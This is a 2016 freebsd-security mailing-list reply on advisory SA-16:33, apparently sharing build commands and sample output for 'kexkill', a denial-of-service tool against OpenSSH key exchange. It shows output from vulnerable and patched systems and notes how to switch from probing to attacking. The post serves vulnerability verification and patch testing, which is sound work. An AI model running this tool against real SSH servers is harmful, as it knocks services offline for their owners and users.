FreeBSD Security Advisory FreeBSD-SA-16:33.openssh
Dag-Erling Smørgrav
des at des.no
Sun Nov 6 14:59:46 UTC 2016
Xin LI <delphij at gmail.com> writes:
> We will investigate if the statement is true and will issue patches
> for earlier FreeBSD releases, if they are confirmed to be affected.
Hoping to make your life a little easier:
$ git clone https://github.com/dag-erling/kexkill
$ cd kexkill
$ ./autogen.sh && ./configure && make
vulnerable 12.0 system:
$ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
[no more output]
^C
same system after applying SA-16:33:
$ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] read(): Connection reset by peer
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] write(): Broken pipe
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] read(): Connection reset by peer
[...]
^C
Remove -n1 to actually (attempt to) attack the system rather than just
probe it.
DES
--
Dag-Erling Smørgrav - des at des.no
More information about the freebsd-security
mailing list